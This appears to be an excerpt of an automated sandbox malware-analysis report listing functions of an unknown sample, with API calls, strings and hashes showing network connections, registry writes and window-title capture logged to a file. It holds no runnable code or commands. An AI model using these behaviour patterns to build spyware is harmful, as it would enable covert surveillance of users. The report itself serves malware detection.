                                                                                                                                                                      Function 0377DA30 Relevance: 21.3, APIs: 14, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0377A8C1,?,?), ref: 0377DA43
                                                                                                                                                                      • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0377A8C1,?,?), ref: 0377DA62
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                      • Opcode ID: 57346d074488df0db12a513d2844d98e0779bb7040f5d58b2f47b92d9912f510
                                                                                                                                                                      • Instruction ID: 6798e6fbfe37bdf6b75ccc3334f3d73b641c29afd45d09d055bdd23145c680cd
                                                                                                                                                                      • Opcode Fuzzy Hash: 57346d074488df0db12a513d2844d98e0779bb7040f5d58b2f47b92d9912f510
                                                                                                                                                                      • Instruction Fuzzy Hash: 2881D271701205AFDB30EFA9D884B6AB7E4FF48315F194669E909DB641E771E801CBD0
                                                                                                                                                                      Function 0377C5E0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 164registryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C63D
                                                                                                                                                                      • _memset.LIBCMT ref: 0377C64C
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0377C66F
                                                                                                                                                                        • Part of subcall function 0377C81E: RegCloseKey.ADVAPI32(80000000,0377C7FA), ref: 0377C82B
                                                                                                                                                                        • Part of subcall function 0377C81E: RegCloseKey.ADVAPI32(00000000), ref: 0377C834
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close_memset$Open
                                                                                                                                                                      • String ID: %08X
                                                                                                                                                                      • API String ID: 4292648718-3773563069
                                                                                                                                                                      • Opcode ID: da8256d84bdb814bfae18285a6e5158c2fc4f13ed0cd789c674d3174476ba024
                                                                                                                                                                      • Instruction ID: fe29fa791662726fc4e01757f8325b8a73529e4b63d672701c1434292aa4003e
                                                                                                                                                                      • Opcode Fuzzy Hash: da8256d84bdb814bfae18285a6e5158c2fc4f13ed0cd789c674d3174476ba024
                                                                                                                                                                      • Instruction Fuzzy Hash: FC5133F2A40219BBDB25EF50DC85FEA7778EB48704F40469DF705AA180DB74AB44CB94
                                                                                                                                                                      Function 037736F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 03773710
                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03773749
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03773766
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03773779
                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 0377377B
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,037A1F0C), ref: 0377378D
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,037A1F0C), ref: 03773799
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,037A1F0C), ref: 037737B8
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,037A1F0C), ref: 037737C4
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 037737D2
                                                                                                                                                                      • htons.WS2_32(?), ref: 037737F8
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 03773816
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 0377382B
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,037A1F0C), ref: 0377383A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                      • Opcode ID: 83c23c7156a2f2f9546bbedb825f4ea5bdb5cdbf05adf9a281f696d8c7e63d3d
                                                                                                                                                                      • Instruction ID: 039c6b5243c36624d5a399da3a5c1b6ae2944fc17a630f9b641e5df8ee8111e0
                                                                                                                                                                      • Opcode Fuzzy Hash: 83c23c7156a2f2f9546bbedb825f4ea5bdb5cdbf05adf9a281f696d8c7e63d3d
                                                                                                                                                                      • Instruction Fuzzy Hash: ED417075A40309BBEB20EBA4DC89F7BB778FB48710F10461AF7159A2C0C674A905DB60
                                                                                                                                                                      Function 02C636F0 Relevance: 21.1, APIs: 14, Instructions: 141networkstringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 02C63710
                                                                                                                                                                      • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 02C63749
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 02C63766
                                                                                                                                                                      • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 02C63779
                                                                                                                                                                      • WSACreateEvent.WS2_32 ref: 02C6377B
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,02C7D990), ref: 02C6378D
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,02C7D990), ref: 02C63799
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,02C7D990), ref: 02C637B8
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,02C7D990), ref: 02C637C4
                                                                                                                                                                      • gethostbyname.WS2_32(00000000), ref: 02C637D2
                                                                                                                                                                      • htons.WS2_32(?), ref: 02C637F8
                                                                                                                                                                      • WSAEventSelect.WS2_32(?,?,00000030), ref: 02C63816
                                                                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 02C6382B
                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,02C7D990), ref: 02C6383A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1455939504-0
                                                                                                                                                                      • Opcode ID: 53d29f25b01721bf5bf80cd48785df4dc5a454a9b1a1c53c04fb325949c674d3
                                                                                                                                                                      • Instruction ID: 5744601b9ac0425285b764c3fcc929b9bbd1bcf665e210ba5e18c541d031c85c
                                                                                                                                                                      • Opcode Fuzzy Hash: 53d29f25b01721bf5bf80cd48785df4dc5a454a9b1a1c53c04fb325949c674d3
                                                                                                                                                                      • Instruction Fuzzy Hash: 48416FB1A40245ABE710DFA4DC89F7FB7B8EF88715F504619FA11A72C0C775A904CB60
                                                                                                                                                                      Function 0377AA10 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 190sleeptimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,A0516FA3), ref: 0377AA58
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377AA8F
                                                                                                                                                                      • _memset.LIBCMT ref: 0377AAA7
                                                                                                                                                                      • _memset.LIBCMT ref: 0377AABA
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 03778038
                                                                                                                                                                        • Part of subcall function 03778020: _memset.LIBCMT ref: 03778042
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 0377804B
                                                                                                                                                                        • Part of subcall function 03778020: lstrlenW.KERNEL32(?), ref: 03778056
                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0377ABBE
                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0377AC6E
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0377ACAA
                                                                                                                                                                        • Part of subcall function 0377F707: _malloc.LIBCMT ref: 0377F721
                                                                                                                                                                        • Part of subcall function 03779730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,A0516FA3,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E,00000000), ref: 03779773
                                                                                                                                                                        • Part of subcall function 03779730: InitializeCriticalSectionAndSpinCount.KERNEL32(0377E1AE,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779812
                                                                                                                                                                        • Part of subcall function 03779730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0379125B,000000FF,?,0377E04E), ref: 03779850
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                                                                      • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                                                                      • API String ID: 1254190970-1225219777
                                                                                                                                                                      • Opcode ID: 254cae7af68feec7df662b83936e033a97fd6d931557606a2fbdfc5ad6bb8696
                                                                                                                                                                      • Instruction ID: 6de2dd21563ec993763221e29d83b1153ce0da42d5c9490ac85f16c708a26ccd
                                                                                                                                                                      • Opcode Fuzzy Hash: 254cae7af68feec7df662b83936e033a97fd6d931557606a2fbdfc5ad6bb8696
                                                                                                                                                                      • Instruction Fuzzy Hash: 136180F1508340AFEB60EF54DC85EAFB7E9BB89614F004A2DF19987241E7349545CBA3
                                                                                                                                                                      Function 0377C860 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66registrystringCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0377C889
                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?), ref: 0377C894
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377C8A4
                                                                                                                                                                      • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0377C8C3
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0377C8D1
                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0377C8E4
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0377C8F2
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0377C900
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                                                                      • String ID: AppEvents$Network
                                                                                                                                                                      • API String ID: 3935456190-3733486940
                                                                                                                                                                      • Opcode ID: ccf74e81604af24a260a60739e0086a141f68ff0642ea5ae06ee9fb4dd230624
                                                                                                                                                                      • Instruction ID: f22aa58299a4934fe0bf95e35c292ea13cd93ad7d11a342165963aa5b383a97e
                                                                                                                                                                      • Opcode Fuzzy Hash: ccf74e81604af24a260a60739e0086a141f68ff0642ea5ae06ee9fb4dd230624
                                                                                                                                                                      • Instruction Fuzzy Hash: 28118675B01218FBFB10EBA9EC89FABB36CEB09710F10465AFA0197241D6759E01D7A4
                                                                                                                                                                      Function 035FA0AF Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$swprintf$_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1873853019-0
                                                                                                                                                                      • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                      • Instruction ID: b546a3146aa8e427d3e910f09947944f4221d25a6ccf95b6a3d9569dfc79574b
                                                                                                                                                                      • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                      • Instruction Fuzzy Hash: EF81D6B5940301AFE710EB54EC86F6B77A4BF85310F1841A8EE095F3D6EB71E910C6A6
                                                                                                                                                                      Function 02C65A20 Relevance: 16.7, APIs: 11, Instructions: 227timeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,DFA3C3C3), ref: 02C65A65
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65B04
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B42
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B67
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65C5F
                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 02C65C80
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65B8C
                                                                                                                                                                        • Part of subcall function 02C61280: __CxxThrowException@8.LIBCMT ref: 02C61290
                                                                                                                                                                        • Part of subcall function 02C61280: DeleteCriticalSection.KERNEL32(00000000,?,02C77E78), ref: 02C612A1
                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,00000000), ref: 02C65CF1
                                                                                                                                                                      • timeGetTime.WINMM ref: 02C65CF7
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C65D0B
                                                                                                                                                                      • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C65D14
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1400036169-0
                                                                                                                                                                      • Opcode ID: 5390c63acb6eb3b31d4d4728caa79a21b5d68e30ccb2581f27b649060836bc1d
                                                                                                                                                                      • Instruction ID: 770cd5a9495b9b5176fe444d6fe98399a4d690f893432d610a36ba200cbd43c5
                                                                                                                                                                      • Opcode Fuzzy Hash: 5390c63acb6eb3b31d4d4728caa79a21b5d68e30ccb2581f27b649060836bc1d
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DA1D2B0A01A46AFD354DF6A888879AFBA8FB08344F90462ED11DD7640D774A964CF90
                                                                                                                                                                      Function 03774CB0 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,A0516FA3,?,?,?,?,00000000,000000FF,00000000), ref: 03774CE6
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,A0516FA3,?,?,?,?,00000000,000000FF,00000000), ref: 03774D0D
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03774D21
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03774D28
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                      • Opcode ID: 5bc85c70708e74985413b96e83c445220a6eef762ce3560c4740f18d0d7a8f95
                                                                                                                                                                      • Instruction ID: 8b6812583d372d77f16137d4cee7af647021726d696c5c2333037334d879f1af
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bc85c70708e74985413b96e83c445220a6eef762ce3560c4740f18d0d7a8f95
                                                                                                                                                                      • Instruction Fuzzy Hash: F851C176A04708DFCB24EFA9E884A6AF7F4FB48710F058A6EE91AD7741D735A400CB51
                                                                                                                                                                      Function 02C64C90 Relevance: 16.7, APIs: 11, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,DFA3C3C3,?,?,?,?,00000000,000000FF,00000000), ref: 02C64CC6
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,DFA3C3C3,?,?,?,?,00000000,000000FF,00000000), ref: 02C64CED
                                                                                                                                                                      • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02C64D01
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02C64D08
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2124651672-0
                                                                                                                                                                      • Opcode ID: 8d737cad8e08bdfcbeaf6e5747714396cc624bd3427fd9ac9b3386a171bbcafd
                                                                                                                                                                      • Instruction ID: f01188dba5deba59980a3ebb3b27b01bc64bbef42725079179d567fa40463c56
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d737cad8e08bdfcbeaf6e5747714396cc624bd3427fd9ac9b3386a171bbcafd
                                                                                                                                                                      • Instruction Fuzzy Hash: 2551AE76E04601DFC324DFA8D989B6AF7F5FF88711F104A2AE90A87740D735A4148B91
                                                                                                                                                                      Function 035FBD5F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 170COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$_wcsrchr
                                                                                                                                                                      • String ID: D
                                                                                                                                                                      • API String ID: 170005318-2746444292
                                                                                                                                                                      • Opcode ID: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                      • Instruction ID: fbcb9cf6111574d092459bd5e0057a7120408d209a0f336a8da3981c857e404b
                                                                                                                                                                      • Opcode Fuzzy Hash: dbe0af0cfe405bfaa2f7670afa9565592a0c6507b5e6e8f9ef5526909d63a184
                                                                                                                                                                      • Instruction Fuzzy Hash: 3651087194031DBEDB24EBA0DC85FEA7778EF54700F4005D9A709AA090EB709A54CF66
                                                                                                                                                                      Function 0377E730 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74stringtimeCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E751
                                                                                                                                                                      • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 0377E759
                                                                                                                                                                      • GetWindowTextW.USER32(00000000,037A16F0,00000800), ref: 0377E76F
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E78D
                                                                                                                                                                      • lstrlenW.KERNEL32(037A16F0,?,?,?,?,74DF23A0,00000000), ref: 0377E7AC
                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 0377E7BD
                                                                                                                                                                      • wsprintfW.USER32 ref: 0377E804
                                                                                                                                                                        • Part of subcall function 0377E6B0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6BD
                                                                                                                                                                        • Part of subcall function 0377E6B0: CreateFileW.KERNEL32(037A0D80,40000000,00000002,00000000,00000004,00000002,00000000,?,?,0377E815,?,?,?,?,74DF23A0,00000000), ref: 0377E6D7
                                                                                                                                                                        • Part of subcall function 0377E6B0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0377E6F2
                                                                                                                                                                        • Part of subcall function 0377E6B0: lstrlenW.KERNEL32(?,00000000,00000000), ref: 0377E6FF
                                                                                                                                                                        • Part of subcall function 0377E6B0: WriteFile.KERNEL32(00000000,?,00000000), ref: 0377E70A
                                                                                                                                                                        • Part of subcall function 0377E6B0: CloseHandle.KERNEL32(00000000), ref: 0377E711
                                                                                                                                                                        • Part of subcall function 0377E6B0: ReleaseMutex.KERNEL32(00000000), ref: 0377E71E
                                                                                                                                                                      • _memset.LIBCMT ref: 0377E820
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                                                                                                                                                      • String ID: [
                                                                                                                                                                      • API String ID: 2192163267-4056885943
                                                                                                                                                                      • Opcode ID: fa69f451f183e21d93fdf46a2b6f3b60779889de8bdd64fe3c8f8eff74c6c750
                                                                                                                                                                      • Instruction ID: 76b15f3ef830ebe5d6e7003f1b39d7173710c577057d4eb8312d232b63c6ae50
                                                                                                                                                                      • Opcode Fuzzy Hash: fa69f451f183e21d93fdf46a2b6f3b60779889de8bdd64fe3c8f8eff74c6c750
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E21D3B5A40228BAE760EF549C05BBA73BCFB44700F44C29AF54496181DE785985CBE4
                                                                                                                                                                      Function 02BD55C8 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 68COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID: !jWW$.$_$i$l${vU_
                                                                                                                                                                      • API String ID: 2102423945-3065862289
                                                                                                                                                                      • Opcode ID: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                      • Instruction ID: de59d0199cb92981aa6dd497b75b09911fe004883ca56642414be7140e791e23
                                                                                                                                                                      • Opcode Fuzzy Hash: 2b6eedebc133e2266d96017898138cdc43810d24d5c9c443b0251b8ba9ddad3f
                                                                                                                                                                      • Instruction Fuzzy Hash: 38216D74A413589FD720DF54DC80FAABBB5FF85700F0481CAE54C9A641E7B19A84CF52
                                                                                                                                                                      Function 03773DE0 Relevance: 15.1, APIs: 10, Instructions: 117memorynetworkCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0377398D,?,00000000,000000FF,00000000), ref: 03773E05
